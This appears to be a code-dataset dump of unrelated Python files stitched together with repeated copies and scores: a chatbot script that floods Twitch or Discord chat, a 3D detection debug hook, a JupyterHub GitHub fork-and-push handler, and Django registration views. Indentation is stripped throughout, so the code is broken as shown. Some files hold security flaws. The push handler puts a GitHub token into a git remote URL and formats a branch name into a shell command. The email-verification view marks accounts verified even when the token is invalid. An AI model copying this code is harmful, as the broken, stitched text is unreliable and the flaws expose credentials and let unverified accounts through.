Parent.Log(ScriptName, "Spam text generated, PROCEEDING TO SPAM! (evil laughter)")
count = 0
while count < spamCount:
send_message(spam, chatType)
count += 1
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Spamming completed... Back to the shadows I go...")
return
#---------------------------
# [Optional] Unload (Called when a user reloads their scripts or closes the bot / cleanup stuff)
#---------------------------
def Unload():
return
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
return
def send_message(message, chatType):
if chatType:
if chatType == "discord":
Parent.SendDiscordMessage(message)
else:
Parent.SendStreamMessage(message)
else:
Parent.SendStreamMessage(message)
def openreadme():
os.startfile(ReadMe) | SpamParameter_StreamlabsSystem.py | import codecs
import json
import os
import re
import sys
#---------------------------
# [Required] Script Information
#---------------------------
ScriptName = "Spam Parameter"
Website = "https://www.twitch.tv/EncryptedThoughts"
Description = "Parameter ($spam) to be used in custom commands that will duplicate and spam the input message to chat. See readme.txt for use instructions."
Creator = "EncryptedThoughts"
Version = "1.0.0.0"
#---------------------------
# Define Global Variables
#---------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMe = os.path.join(os.path.dirname(__file__), "README.txt")
#---------------------------------------
# Classes
#---------------------------------------
class Settings(object):
def __init__(self, SettingsFile=None):
if SettingsFile and os.path.isfile(SettingsFile):
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
else:
self.EnableDebug = True
def Reload(self, jsondata):
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
def Save(self, SettingsFile):
try:
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8")
with codecs.open(SettingsFile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8')))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
return
#---------------------------
# [Required] Initialize Data (Only called on load)
#---------------------------
def Init():
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
ScriptSettings.Save(SettingsFile)
return
#---------------------------
# [Optional] Reload Settings (Called when a user clicks the Save Settings button in the Chatbot UI)
#---------------------------
def ReloadSettings(jsonData):
# Execute json reloading here
ScriptSettings.__dict__ = json.loads(jsonData)
ScriptSettings.Save(SettingsFile)
return
#---------------------------
# [Required] Execute Data / Process messages
#---------------------------
def Execute(data):
return
#---------------------------
# [Required] Tick method (Gets called during every iteration even when there is no incoming data)
#---------------------------
def Tick():
return
#---------------------------
# [Optional] Parse method (Allows you to create your own custom $parameters)
#---------------------------
def Parse(parseString, userid, username, targetid, targetname, message):
regex = "\$spam\(\s*(discord|stream)\s*,\s*[0-9]+\s*,\s*[0-9]+\s*,\s*(true|false)\s*,.*\)" # !spam(string,number,number,bool,string)
item = re.search(regex, parseString)
if item is None:
return parseString
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Oh boy! Spam parameter detected: " + item.group())
rawArguments = item.group().strip()[6:][:-1]
args = rawArguments.split(",")
chatType = args[0]
spamCount = int(args[1])
maxLength = int(args[2])
allowPartialMessage = args[3]
inputMessage = ""
#allow , in final parameter in case the message needs to contain one
currentArg = 4
while currentArg < len(args):
if currentArg > 4:
inputMessage += ","
inputMessage += args[currentArg]
currentArg += 1
if chatType == "stream" and maxLength > 400:
maxLength = 400
if chatType == "discord" and maxLength > 1795:
maxLength = 1795
spam = ""
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Vomits Info -> chatType: " + chatType + " spamCount: " + str(spamCount) + " maxLength: " + str(maxLength) + " allowPartialMessage: " + str(allowPartialMessage) + " inputMessage: " + inputMessage)
while len(spam) <= maxLength:
if allowPartialMessage == "false" and (len(spam) + len(inputMessage) + 1) > maxLength:
break
spam += " " + inputMessage
if len(spam) > maxLength:
spam = spam[:maxLength - len(SpamText)]
parseString = parseString.replace(item.group(), spam)
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Spam text generated, PROCEEDING TO SPAM! (evil laughter)")
count = 0
while count < spamCount:
send_message(spam, chatType)
count += 1
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Spamming completed... Back to the shadows I go...")
return
#---------------------------
# [Optional] Unload (Called when a user reloads their scripts or closes the bot / cleanup stuff)
#---------------------------
def Unload():
return
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
return
def send_message(message, chatType):
if chatType:
if chatType == "discord":
Parent.SendDiscordMessage(message)
else:
Parent.SendStreamMessage(message)
else:
Parent.SendStreamMessage(message)
def openreadme():
os.startfile(ReadMe) | 0.238284 | 0.104523 |
import os.path as osp
import torch
import mmcv
import cv2
from mmcv.runner.hooks import HOOKS, Hook
from mmcv.runner import master_only
from mmdet.core.utils import tensor2imgs
from mmdet.utils.det3d import box_np_ops
import numpy as np
def imshow_3d_det_bboxes(img,
corners,
labels,
scores=None,
class_names=None,
score_thr=0,
bbox_color='green',
text_color='green',
thickness=1,
font_scale=0.5,
show=True,
win_name='',
wait_time=0,
out_file=None):
"""Draw 3d bboxes and class labels (with scores) on an image.
Args:
img (str or ndarray): The image to be displayed.
corners (ndarray): Bounding boxes (with scores), shaped (n, 8, 2).
labels (ndarray): Labels of bboxes.
class_names (list[str]): Names of each classes.
score_thr (float): Minimum score of bboxes to be shown.
bbox_color (str or tuple or :obj:`Color`): Color of bbox lines.
text_color (str or tuple or :obj:`Color`): Color of texts.
thickness (int): Thickness of lines.
font_scale (float): Font scales of texts.
show (bool): Whether to show the image.
win_name (str): The window name.
wait_time (int): Value of waitKey param.
out_file (str or None): The filename to write the image.
"""
assert corners.ndim == 3
assert labels.ndim == 1
assert corners.shape[0] == labels.shape[0]
assert corners.shape[1] == 8
img = mmcv.imread(img)
if score_thr > 0:
assert scores is not None
assert scores.shape[0] == labels.shape[0]
bbox_color = mmcv.color_val(bbox_color)
text_color = mmcv.color_val(text_color)
for corner, label in zip(corners, labels):
corner = np.round(corner).astype(np.int32)
bbox_color = (list(np.random.choice(range(256), size=3)))
bbox_color = [int(bbox_color[0]), int(
bbox_color[1]), int(bbox_color[2])]
for i1, i2 in [(0, 1), (1, 2), (2, 3), (3, 0),
(4, 5), (5, 6), (6, 7), (7, 4), (4, 6), (5, 7),
(0, 4), (1, 5), (2, 6), (3, 7)]:
cv2.line(
img, tuple(corner[i1]), tuple(corner[i2]), bbox_color, thickness=thickness, lineType=cv2.LINE_AA)
label_text = class_names[
label] if class_names is not None else 'cls {}'.format(label)
cv2.putText(img, label_text, (corner[0, 0], corner[0, 1] - 2),
cv2.FONT_HERSHEY_COMPLEX, font_scale, text_color)
if show:
mmcv.imshow(img, win_name, wait_time)
if out_file is not None:
mmcv.imwrite(img, out_file)
@HOOKS.register_module
class DebugLoggerHook(Hook):
def __init__(self,
log_dir=None,
interval=10,
enable=False):
super(DebugLoggerHook, self).__init__()
self.log_dir = log_dir
self.enable = enable
@master_only
def after_train_iter(self, runner):
if not self.enable:
return
# draw images
data = runner.data_batch
data = {k: v.data[0] for k, v in data.items()} # data of GPU:0
# data = {k: v[0] for k, v in data.items()} # data of sample 0
# available keys:
# K, fL, gt_bboxes, gt_bboxes_ignore, gt_labels
# img_meta, left_img, right_img, t2to3, velo2cam2, velo2cam3
iter_idx = runner._iter
img_metas = data['img_meta']
left_img_tensor = data['left_img']
right_img_tensor = data['right_img']
gt_bboxes = data['gt_bboxes']
gt_bboxes_3d = data['gt_bboxes_3d']
intrinsics = data['K']
gt_bboxes_ignore = data['gt_bboxes_ignore']
left_imgs = tensor2imgs(
left_img_tensor, **img_metas[0]['img_norm_cfg'])
right_imgs = tensor2imgs(
right_img_tensor, **img_metas[0]['img_norm_cfg'])
mix_imgs = [(l * 0.65 + r * 0.35)
for l, r in zip(left_imgs, right_imgs)]
for idx in range(len(left_imgs)):
img_show = mix_imgs[idx].copy()
img_show_3d = mix_imgs[idx].copy()
bboxes = gt_bboxes[idx].detach().cpu().numpy()
bboxes_3d = gt_bboxes_3d[idx].detach().cpu().numpy()
K = intrinsics[idx].detach().cpu().numpy()
corners = box_np_ops.center_to_corner_box3d(
bboxes_3d[:, :3], bboxes_3d[:, 3:6], bboxes_3d[:, 6], origin=[0.5, 1.0, 0.5], axis=1)
bboxes_ignore = gt_bboxes_ignore[idx].detach().cpu().numpy()
labels = data['gt_labels'][idx].detach().cpu().numpy()
labels_ignore = np.array([0] * len(bboxes_ignore))
swap = img_metas[idx]['swap']
flip = img_metas[idx]['flip']
filename = img_metas[idx]['left_filename']
cv2.putText(img_show, "swap " + str(swap), (10, 10),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show, "flip " + str(flip), (10, 30),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show, filename, (10, 50),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, "swap " + str(swap), (10, 10),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, "flip " + str(flip), (10, 30),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, filename, (10, 50),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
mmcv.imshow_det_bboxes(
img_show,
bboxes,
labels,
class_names=['?', 'c', 'p', 'b'],
bbox_color='green',
score_thr=0.,
show=False)
corners_2d = corners @ K.T
corners_2d = corners_2d[..., :2] / corners_2d[..., 2:3]
imshow_3d_det_bboxes(
img_show_3d,
corners_2d,
labels,
class_names=['?', 'c', 'p', 'b'],
bbox_color='green',
score_thr=0.,
show=False,
out_file=osp.join(self.log_dir, f'debug_{iter_idx:06d}_{idx:02d}_3d.jpg'))
mmcv.imshow_det_bboxes(
img_show,
bboxes_ignore,
labels_ignore,
class_names=['x'],
bbox_color='red',
score_thr=0.,
show=False,
out_file=osp.join(self.log_dir, f'debug_{iter_idx:06d}_{idx:02d}.jpg'))
print("saving debug img to ", self.log_dir,
iter_idx, idx, "swap", swap, filename) | mmdet/core/utils/debug_utils.py | import os.path as osp
import torch
import mmcv
import cv2
from mmcv.runner.hooks import HOOKS, Hook
from mmcv.runner import master_only
from mmdet.core.utils import tensor2imgs
from mmdet.utils.det3d import box_np_ops
import numpy as np
def imshow_3d_det_bboxes(img,
corners,
labels,
scores=None,
class_names=None,
score_thr=0,
bbox_color='green',
text_color='green',
thickness=1,
font_scale=0.5,
show=True,
win_name='',
wait_time=0,
out_file=None):
"""Draw 3d bboxes and class labels (with scores) on an image.
Args:
img (str or ndarray): The image to be displayed.
corners (ndarray): Bounding boxes (with scores), shaped (n, 8, 2).
labels (ndarray): Labels of bboxes.
class_names (list[str]): Names of each classes.
score_thr (float): Minimum score of bboxes to be shown.
bbox_color (str or tuple or :obj:`Color`): Color of bbox lines.
text_color (str or tuple or :obj:`Color`): Color of texts.
thickness (int): Thickness of lines.
font_scale (float): Font scales of texts.
show (bool): Whether to show the image.
win_name (str): The window name.
wait_time (int): Value of waitKey param.
out_file (str or None): The filename to write the image.
"""
assert corners.ndim == 3
assert labels.ndim == 1
assert corners.shape[0] == labels.shape[0]
assert corners.shape[1] == 8
img = mmcv.imread(img)
if score_thr > 0:
assert scores is not None
assert scores.shape[0] == labels.shape[0]
bbox_color = mmcv.color_val(bbox_color)
text_color = mmcv.color_val(text_color)
for corner, label in zip(corners, labels):
corner = np.round(corner).astype(np.int32)
bbox_color = (list(np.random.choice(range(256), size=3)))
bbox_color = [int(bbox_color[0]), int(
bbox_color[1]), int(bbox_color[2])]
for i1, i2 in [(0, 1), (1, 2), (2, 3), (3, 0),
(4, 5), (5, 6), (6, 7), (7, 4), (4, 6), (5, 7),
(0, 4), (1, 5), (2, 6), (3, 7)]:
cv2.line(
img, tuple(corner[i1]), tuple(corner[i2]), bbox_color, thickness=thickness, lineType=cv2.LINE_AA)
label_text = class_names[
label] if class_names is not None else 'cls {}'.format(label)
cv2.putText(img, label_text, (corner[0, 0], corner[0, 1] - 2),
cv2.FONT_HERSHEY_COMPLEX, font_scale, text_color)
if show:
mmcv.imshow(img, win_name, wait_time)
if out_file is not None:
mmcv.imwrite(img, out_file)
@HOOKS.register_module
class DebugLoggerHook(Hook):
def __init__(self,
log_dir=None,
interval=10,
enable=False):
super(DebugLoggerHook, self).__init__()
self.log_dir = log_dir
self.enable = enable
@master_only
def after_train_iter(self, runner):
if not self.enable:
return
# draw images
data = runner.data_batch
data = {k: v.data[0] for k, v in data.items()} # data of GPU:0
# data = {k: v[0] for k, v in data.items()} # data of sample 0
# available keys:
# K, fL, gt_bboxes, gt_bboxes_ignore, gt_labels
# img_meta, left_img, right_img, t2to3, velo2cam2, velo2cam3
iter_idx = runner._iter
img_metas = data['img_meta']
left_img_tensor = data['left_img']
right_img_tensor = data['right_img']
gt_bboxes = data['gt_bboxes']
gt_bboxes_3d = data['gt_bboxes_3d']
intrinsics = data['K']
gt_bboxes_ignore = data['gt_bboxes_ignore']
left_imgs = tensor2imgs(
left_img_tensor, **img_metas[0]['img_norm_cfg'])
right_imgs = tensor2imgs(
right_img_tensor, **img_metas[0]['img_norm_cfg'])
mix_imgs = [(l * 0.65 + r * 0.35)
for l, r in zip(left_imgs, right_imgs)]
for idx in range(len(left_imgs)):
img_show = mix_imgs[idx].copy()
img_show_3d = mix_imgs[idx].copy()
bboxes = gt_bboxes[idx].detach().cpu().numpy()
bboxes_3d = gt_bboxes_3d[idx].detach().cpu().numpy()
K = intrinsics[idx].detach().cpu().numpy()
corners = box_np_ops.center_to_corner_box3d(
bboxes_3d[:, :3], bboxes_3d[:, 3:6], bboxes_3d[:, 6], origin=[0.5, 1.0, 0.5], axis=1)
bboxes_ignore = gt_bboxes_ignore[idx].detach().cpu().numpy()
labels = data['gt_labels'][idx].detach().cpu().numpy()
labels_ignore = np.array([0] * len(bboxes_ignore))
swap = img_metas[idx]['swap']
flip = img_metas[idx]['flip']
filename = img_metas[idx]['left_filename']
cv2.putText(img_show, "swap " + str(swap), (10, 10),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show, "flip " + str(flip), (10, 30),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show, filename, (10, 50),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, "swap " + str(swap), (10, 10),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, "flip " + str(flip), (10, 30),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, filename, (10, 50),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
mmcv.imshow_det_bboxes(
img_show,
bboxes,
labels,
class_names=['?', 'c', 'p', 'b'],
bbox_color='green',
score_thr=0.,
show=False)
corners_2d = corners @ K.T
corners_2d = corners_2d[..., :2] / corners_2d[..., 2:3]
imshow_3d_det_bboxes(
img_show_3d,
corners_2d,
labels,
class_names=['?', 'c', 'p', 'b'],
bbox_color='green',
score_thr=0.,
show=False,
out_file=osp.join(self.log_dir, f'debug_{iter_idx:06d}_{idx:02d}_3d.jpg'))
mmcv.imshow_det_bboxes(
img_show,
bboxes_ignore,
labels_ignore,
class_names=['x'],
bbox_color='red',
score_thr=0.,
show=False,
out_file=osp.join(self.log_dir, f'debug_{iter_idx:06d}_{idx:02d}.jpg'))
print("saving debug img to ", self.log_dir,
iter_idx, idx, "swap", swap, filename) | 0.766206 | 0.506469 |
from tornado import web, gen
from docker.errors import NotFound
from jupyterhub.handlers.base import BaseHandler
from IPython.html.utils import url_path_join
from tornado.httputil import url_concat
from tornado.httpclient import HTTPRequest, AsyncHTTPClient
import json
import re
@gen.coroutine
def _fork_github_repo(url, token):
http_client = AsyncHTTPClient()
headers={"User-Agent": "JupyterHub",
"Authorization": "token {}".format(token)
}
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL is not a github URL')
owner, repo = result[0]
api_url = "https://api.github.com/repos/%s/%s/forks" % (owner, repo)
req = HTTPRequest(api_url,
method="POST",
headers=headers,
body='',
)
resp = yield http_client.fetch(req)
return json.loads(resp.body.decode('utf8', 'replace'))
@gen.coroutine
def _github_fork_exists(username, url, token):
http_client = AsyncHTTPClient()
headers={"User-Agent": "JupyterHub",
"Authorization": "token {}".format(token)
}
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL (%s) is not a github URL' % url)
owner, repo = result[0]
api_url = "https://api.github.com/repos/%s/%s" % (username, repo)
req = HTTPRequest(api_url,
method="GET",
headers=headers,
)
try:
resp = yield http_client.fetch(req)
return True
except:
return False
@gen.coroutine
def _repository_changed(user):
try:
setup = yield user.spawner.docker(
'exec_create',
container=user.spawner.container_id,
cmd="bash -c 'cd $JPY_WORKDIR && \
(git fetch --unshallow > /dev/null 2>&1; true) && \
git diff --name-only'",
)
out = yield user.spawner.docker(
'exec_start',
exec_id=setup['Id'],
)
except NotFound:
return False
if out:
return True
else:
return False
@gen.coroutine
def _push_github_repo(user, url, commit_sha, branch_name, token):
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL is not a github URL')
owner, repo = result[0]
fork_url = "https://{}@github.com/{}/{}".format(token, user.name, repo)
out = yield user.spawner.docker(
'exec_create',
container=user.spawner.container_id,
cmd="bash -c 'cd $JPY_WORKDIR && \
git config --global user.email \"<EMAIL>\" && \
git config --global user.name \"Everware\" && \
(git fetch --unshallow; true) && \
git add . && \
git commit -m \"Update through everware\" && \
(git remote add everware-fork {fork_url}; true) && \
git push -f everware-fork {branch_name}'".format(
fork_url=fork_url,
commit_sha=commit_sha,
branch_name=branch_name
),
)
response = yield user.spawner.docker(
'exec_start',
exec_id=out['Id'],
)
class HomeHandler(BaseHandler):
"""Render the user's home page."""
@web.authenticated
@gen.coroutine
def get(self):
user = self.get_current_user()
repourl = self.get_argument('repourl', '')
do_fork = self.get_argument('do_fork', False)
do_push = self.get_argument('do_push', False)
if repourl:
self.log.info('Got %s in home' % repourl)
self.redirect(url_concat(
url_path_join(self.hub.server.base_url, 'spawn'), {
'repourl': repourl
}
))
return
branch_name = commit_sha = None
repo_url = ''
fork_exists = False
repository_changed = False
if user.running and hasattr(user, 'login_service'):
branch_name = user.spawner.branch_name
commit_sha = user.spawner.commit_sha
if user.login_service == "github":
if do_fork:
self.log.info('Will fork %s' % user.spawner.repo_url)
yield _fork_github_repo(
user.spawner.repo_url,
user.token,
)
self.redirect('/hub/home')
return
if do_push:
self.log.info('Will push to fork')
yield _push_github_repo(
user,
user.spawner.repo_url,
commit_sha,
branch_name,
user.token,
)
self.redirect('/hub/home')
return
repo_url = user.spawner.repo_url
fork_exists = yield _github_fork_exists(
user.name,
user.spawner.repo_url,
user.token,
)
repository_changed = yield _repository_changed(user)
if hasattr(user, 'login_service'):
loginservice = user.login_service
else:
loginservice = 'none'
html = self.render_template('home.html',
user=user,
repourl=repo_url,
login_service=loginservice,
fork_exists=fork_exists,
repository_changed=repository_changed,
branch_name=branch_name,
commit_sha=commit_sha
)
self.finish(html) | everware/home_handler.py | from tornado import web, gen
from docker.errors import NotFound
from jupyterhub.handlers.base import BaseHandler
from IPython.html.utils import url_path_join
from tornado.httputil import url_concat
from tornado.httpclient import HTTPRequest, AsyncHTTPClient
import json
import re
@gen.coroutine
def _fork_github_repo(url, token):
http_client = AsyncHTTPClient()
headers={"User-Agent": "JupyterHub",
"Authorization": "token {}".format(token)
}
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL is not a github URL')
owner, repo = result[0]
api_url = "https://api.github.com/repos/%s/%s/forks" % (owner, repo)
req = HTTPRequest(api_url,
method="POST",
headers=headers,
body='',
)
resp = yield http_client.fetch(req)
return json.loads(resp.body.decode('utf8', 'replace'))
@gen.coroutine
def _github_fork_exists(username, url, token):
http_client = AsyncHTTPClient()
headers={"User-Agent": "JupyterHub",
"Authorization": "token {}".format(token)
}
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL (%s) is not a github URL' % url)
owner, repo = result[0]
api_url = "https://api.github.com/repos/%s/%s" % (username, repo)
req = HTTPRequest(api_url,
method="GET",
headers=headers,
)
try:
resp = yield http_client.fetch(req)
return True
except:
return False
@gen.coroutine
def _repository_changed(user):
try:
setup = yield user.spawner.docker(
'exec_create',
container=user.spawner.container_id,
cmd="bash -c 'cd $JPY_WORKDIR && \
(git fetch --unshallow > /dev/null 2>&1; true) && \
git diff --name-only'",
)
out = yield user.spawner.docker(
'exec_start',
exec_id=setup['Id'],
)
except NotFound:
return False
if out:
return True
else:
return False
@gen.coroutine
def _push_github_repo(user, url, commit_sha, branch_name, token):
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL is not a github URL')
owner, repo = result[0]
fork_url = "https://{}@github.com/{}/{}".format(token, user.name, repo)
out = yield user.spawner.docker(
'exec_create',
container=user.spawner.container_id,
cmd="bash -c 'cd $JPY_WORKDIR && \
git config --global user.email \"<EMAIL>\" && \
git config --global user.name \"Everware\" && \
(git fetch --unshallow; true) && \
git add . && \
git commit -m \"Update through everware\" && \
(git remote add everware-fork {fork_url}; true) && \
git push -f everware-fork {branch_name}'".format(
fork_url=fork_url,
commit_sha=commit_sha,
branch_name=branch_name
),
)
response = yield user.spawner.docker(
'exec_start',
exec_id=out['Id'],
)
class HomeHandler(BaseHandler):
"""Render the user's home page."""
@web.authenticated
@gen.coroutine
def get(self):
user = self.get_current_user()
repourl = self.get_argument('repourl', '')
do_fork = self.get_argument('do_fork', False)
do_push = self.get_argument('do_push', False)
if repourl:
self.log.info('Got %s in home' % repourl)
self.redirect(url_concat(
url_path_join(self.hub.server.base_url, 'spawn'), {
'repourl': repourl
}
))
return
branch_name = commit_sha = None
repo_url = ''
fork_exists = False
repository_changed = False
if user.running and hasattr(user, 'login_service'):
branch_name = user.spawner.branch_name
commit_sha = user.spawner.commit_sha
if user.login_service == "github":
if do_fork:
self.log.info('Will fork %s' % user.spawner.repo_url)
yield _fork_github_repo(
user.spawner.repo_url,
user.token,
)
self.redirect('/hub/home')
return
if do_push:
self.log.info('Will push to fork')
yield _push_github_repo(
user,
user.spawner.repo_url,
commit_sha,
branch_name,
user.token,
)
self.redirect('/hub/home')
return
repo_url = user.spawner.repo_url
fork_exists = yield _github_fork_exists(
user.name,
user.spawner.repo_url,
user.token,
)
repository_changed = yield _repository_changed(user)
if hasattr(user, 'login_service'):
loginservice = user.login_service
else:
loginservice = 'none'
html = self.render_template('home.html',
user=user,
repourl=repo_url,
login_service=loginservice,
fork_exists=fork_exists,
repository_changed=repository_changed,
branch_name=branch_name,
commit_sha=commit_sha
)
self.finish(html) | 0.355439 | 0.061876 |
from django.shortcuts import render, redirect
from django.views.generic import FormView, TemplateView
from django.urls import reverse, reverse_lazy
from django.db import transaction
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model, login
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.core import mail
from django.template.loader import render_to_string
from django.contrib import messages
from django.conf import settings
from user.models import UserProfile, Candidate
from . import forms
from user.forms import ResetPasswordEmailForm
User = get_user_model()
def send_verification_email(user, url, request):
context = {
'user': user,
'activation_url': url,
}
message = render_to_string("emails/email-verification.txt", context=context, request=request)
html_message = render_to_string("emails/email-verification.html", context=context, request=request)
subject = 'Verify your account! - TalentAlps'
from_email = settings.DEFAULT_FROM_EMAIL
to = user.email
mail.send_mail(subject, message, from_email, [to], html_message=html_message)
# Create your views here.
class CandidateRegisterView(FormView):
template_name = 'registration/candidate-registration.html'
form_class = forms.UserProfileForm
success_url = reverse_lazy('login')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['candidate_form'] = forms.CandidateRegisterForm()
return context
def form_valid(self, form):
candidate_form = forms.CandidateRegisterForm(self.request.POST)
if candidate_form.is_valid():
# Create User, UserProfile, Candidate models
try:
with transaction.atomic():
user = User.objects.create(
username=form.cleaned_data.get('username'),
email=form.cleaned_data.get('email'),
first_name=form.cleaned_data.get('name')
)
user.set_password(form.cleaned_data.get('password'))
user.save()
userprofile = UserProfile.objects.create(
name=form.cleaned_data.get('name'),
contact=form.cleaned_data.get('contact'),
state=form.cleaned_data.get('state'),
country=form.cleaned_data.get('country'),
user=user
)
candidate = candidate_form.save(commit=False)
candidate.state = form.cleaned_data.get('state')
candidate.nationality = form.cleaned_data.get('country')
candidate.userprofile = userprofile
candidate.save()
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
messages.info(self.request, _(f"A verification email has been sent to - {user.email}, you must verify your account before you can log in."))
return super().form_valid(form)
except:
messages.error(self.request, _("Something went wrong, please try again."))
return super().get(self.request)
else:
return super().form_invalid(candidate_form)
class EmployerRegisterView(FormView):
template_name = 'registration/employer-registration.html'
form_class = forms.UserProfileForm
success_url = reverse_lazy('registration:employer-register-success')
def form_valid(self, form):
try:
with transaction.atomic():
user = User.objects.create(
username=form.cleaned_data.get('email'),
email=form.cleaned_data.get('email'),
first_name=form.cleaned_data.get('name'),
)
user.set_password(form.cleaned_data.get('password'))
user.save()
userprofile = user.userprofile
userprofile.is_employer = True
userprofile.receive_updates = form.cleaned_data.get('receive_updates')
userprofile.save()
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
messages.info(self.request, _(f"A verification email has been sent to - {user.email}, you must verify your account before you can log in."))
return super().form_valid(form)
except:
messages.error(self.request, _("Something went wrong, please try again."))
return super().get(self.request)
class EmployerRegistrationSuccessView(TemplateView):
template_name = 'registration/employer-registration-success.html'
class EmployerResendVerificationEmailView(TemplateView):
template_name = 'registration/employer-resend-verification-email.html'
class UserEmailVerificationView(TemplateView):
template_name = 'registration/user-email-verification.html'
def get(self, request, *args, **kwargs):
self.user = User.objects.get(pk=self.kwargs.get('pk'))
token_generator = PasswordResetTokenGenerator()
url_token = self.kwargs.get('token')
self.valid = False
self.verified = False
if token_generator.check_token(self.user, url_token):
self.valid = True
if self.user.userprofile.verified:
self.verified = True
self.user.userprofile.verified = True
self.user.userprofile.save()
return super().get(request, *args, **kwargs)
class ResendVerificationEmail(FormView):
template_name = 'registration/resend-verification.html'
form_class = ResetPasswordEmailForm
success_url = reverse_lazy('login')
def form_valid(self, form):
messages.info(self.request, _(f"Verification email has been sent to - {form.cleaned_data.get('email')}, please check your inbox."))
try:
user = User.objects.get(email=form.cleaned_data.get('email'))
if not user.userprofile.verified:
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
except User.DoesNotExist:
return super().form_valid(form)
return super().form_valid(form) | registration/views.py | from django.shortcuts import render, redirect
from django.views.generic import FormView, TemplateView
from django.urls import reverse, reverse_lazy
from django.db import transaction
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model, login
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.core import mail
from django.template.loader import render_to_string
from django.contrib import messages
from django.conf import settings
from user.models import UserProfile, Candidate
from . import forms
from user.forms import ResetPasswordEmailForm
User = get_user_model()
def send_verification_email(user, url, request):
context = {
'user': user,
'activation_url': url,
}
message = render_to_string("emails/email-verification.txt", context=context, request=request)
html_message = render_to_string("emails/email-verification.html", context=context, request=request)
subject = 'Verify your account! - TalentAlps'
from_email = settings.DEFAULT_FROM_EMAIL
to = user.email
mail.send_mail(subject, message, from_email, [to], html_message=html_message)
# Create your views here.
class CandidateRegisterView(FormView):
template_name = 'registration/candidate-registration.html'
form_class = forms.UserProfileForm
success_url = reverse_lazy('login')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['candidate_form'] = forms.CandidateRegisterForm()
return context
def form_valid(self, form):
candidate_form = forms.CandidateRegisterForm(self.request.POST)
if candidate_form.is_valid():
# Create User, UserProfile, Candidate models
try:
with transaction.atomic():
user = User.objects.create(
username=form.cleaned_data.get('username'),
email=form.cleaned_data.get('email'),
first_name=form.cleaned_data.get('name')
)
user.set_password(form.cleaned_data.get('password'))
user.save()
userprofile = UserProfile.objects.create(
name=form.cleaned_data.get('name'),
contact=form.cleaned_data.get('contact'),
state=form.cleaned_data.get('state'),
country=form.cleaned_data.get('country'),
user=user
)
candidate = candidate_form.save(commit=False)
candidate.state = form.cleaned_data.get('state')
candidate.nationality = form.cleaned_data.get('country')
candidate.userprofile = userprofile
candidate.save()
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
messages.info(self.request, _(f"A verification email has been sent to - {user.email}, you must verify your account before you can log in."))
return super().form_valid(form)
except:
messages.error(self.request, _("Something went wrong, please try again."))
return super().get(self.request)
else:
return super().form_invalid(candidate_form)
class EmployerRegisterView(FormView):
template_name = 'registration/employer-registration.html'
form_class = forms.UserProfileForm
success_url = reverse_lazy('registration:employer-register-success')
def form_valid(self, form):
try:
with transaction.atomic():
user = User.objects.create(
username=form.cleaned_data.get('email'),
email=form.cleaned_data.get('email'),
first_name=form.cleaned_data.get('name'),
)
user.set_password(form.cleaned_data.get('password'))
user.save()
userprofile = user.userprofile
